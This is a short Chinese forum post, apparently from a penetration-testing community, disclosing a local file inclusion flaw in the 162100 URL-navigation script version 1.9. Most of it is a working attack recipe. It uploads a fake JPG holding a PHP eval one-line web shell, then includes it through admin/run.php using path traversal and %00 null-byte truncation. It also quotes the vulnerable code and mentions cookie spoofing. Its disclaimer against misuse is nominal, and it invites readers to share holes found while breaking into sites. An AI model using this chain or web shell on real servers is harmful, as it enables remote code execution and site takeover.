破程序破漏洞,但是为了鼓励大家学习,还是发出来了。。。拒绝恶意破坏!

程序官方:

admin 目录下 run.php 文件部分代码如下:我找到上传目录

editor/index.html

使用上传图片功能,上传一个1.jpg 内容为 <?php eval($_POST[cmd])?>

获得地址editor/images/upload/2010102718265325.jpg

然后admin/run.php?run=../../editor/images/upload/2010102718265325.jpg%00

就是一个一句话了。。。剩下的你懂的。。。

1 <?php

2 if($_REQUEST[run] && file_exists(./run/.$_REQUEST[run]..php))

3   require_once(./run/.$_REQUEST[run]..php); //这里判断只要文件存在,就可以包含,未做任何限制,可目录跳转,所以,只要能上传文件,然后%00截断,即可上传

4 else

5   alert(命令错误或功能尚未开通!,./index.html);

6 ?>

 

我就传一个phpinfo示意下吧。。。

162100网址导航1.9本地文件包含漏洞及修复


一 一!虽然破程序。但是渗透时候难免遇到。。。希望大家也共享出来平时日站过程中无意挖的一些程序漏洞。共同学习。也节省更多的时间

这套程序还有cookies欺骗等其他漏洞。。。不过意义不太大。。。够用就行

首发tools 陆羽

修复:

这套程序没必要修复了。换了吧